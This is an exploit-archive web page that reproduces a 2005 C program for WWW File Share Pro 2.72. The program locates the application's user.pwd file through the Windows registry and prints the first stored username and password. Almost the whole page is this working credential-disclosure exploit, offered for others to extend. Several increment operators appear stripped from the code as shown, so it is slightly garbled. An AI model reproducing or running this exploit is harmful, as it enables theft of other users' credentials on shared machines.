首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

WWW File Share Pro 2.72 Local Password Disclosure Exploit


http://www.gipsky.com/
/*****************************************************************



WWW File Share Pro 2.72 Local Exploit by Kozan



Application: WWW File Share Pro 2.72

Vendor:LionMax Software

http://www.lionmax.com/



Vulnerable Description: WWW File Share Pro 2.72 discloses passwords

to local users.



Discovered & Coded by: Kozan

Credits to ATmaCA

Web : www.netmagister.com

Web2: www.spyinstructors.com

Mail: kozan[at]netmagister[dot]com



*****************************************************************/



#include <windows.h>

#include <stdio.h>

#include <string.h>



#define BUFSIZE 100

HKEY hKey;

char prgfiles[BUFSIZE];

DWORD dwBufLen=BUFSIZE;

LONG lRet;



char *username, *password;



int adresal(char *FilePath,char *Str)

{

char kr;

int Sayac=0;

int Offset=-1;

FILE *di;

di=fopen(FilePath,"rb");



if( di == NULL )

{

fclose(di);

return -1;

}



while(!feof(di))

{

Sayac ;

for(int i=0;i<strlen(Str);i )

{

kr=getc(di);

if(kr != Str[i])

{

if( i>0 )

{

fseek(di,Sayac 1,SEEK_SET);

}

break;

}

if( i > ( strlen(Str)-2 ) )

{

Offset = ftell(di)-strlen(Str);

fclose(di);

return Offset;

}

}

}

fclose(di);

return -1;

}



char *oku(char *FilePath)

{



FILE *di;

char cr;



int i=0;

char Feature[500];



if( (di=fopen(FilePath,"rb")) == NULL )

return "";



fseek(di,0,SEEK_SET);



while(!feof(di))

{

cr=getc(di);

if(cr == ',') break;



Feature[i] = cr;

i ;

}



Feature[i] = '\0';

fclose(di);

return Feature;

}



char *oku2(char *FilePath,char *Str)

{



FILE *di;

char cr;

int i=0;

char Feature[500];



int Offset = adresal(FilePath,Str);



if( Offset == -1 )

return "";



if( (di=fopen(FilePath,"rb")) == NULL )

return "";



fseek(di,Offset strlen(Str),SEEK_SET);



while(!feof(di))

{

cr=getc(di);

if(cr == ',') break;



Feature[i] = cr;

i ;

}



Feature[i] = '\0';

fclose(di);

return Feature;

}



int main(void)

{

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,

"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",

0,

KEY_QUERY_VALUE,

&hKey) == ERROR_SUCCESS)

{



lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,

(LPBYTE) prgfiles, &dwBufLen);



if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )

{

RegCloseKey(hKey);

printf("An error occured!\n");

return 0;

}



RegCloseKey(hKey);



}

else

{

RegCloseKey(hKey);

printf("An error occured!\n");

return 0;

}



strcat(prgfiles,"\\WWW File Share Pro\\user.pwd");



printf("WWW File Share Pro 2.72 Local Exploit by Kozan\n");

printf("Credits to ATmaCA\n");

printf("www.netmagister.com - www.spyinstructors.com \n\n");

printf("This exploit only shows the first record.\n");

printf("You may improve it freely...\n\n");



try

{

username = oku(prgfiles);

printf("Username1: %s\n",username);

char password1_temp[BUFSIZE];

wsprintf(password1_temp,"%s%c",username,0x2C);

password=oku2(prgfiles,password1_temp);

printf("Password1: %s\n",password);



}catch(...){ printf("An error occured!\n"); return 0; }



return 0;



}

[2005-02-23]
<< SendLink 1.5 Local Password Disclosure Exploit Chat Anywhere 2.72a Local Password Disclosure Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号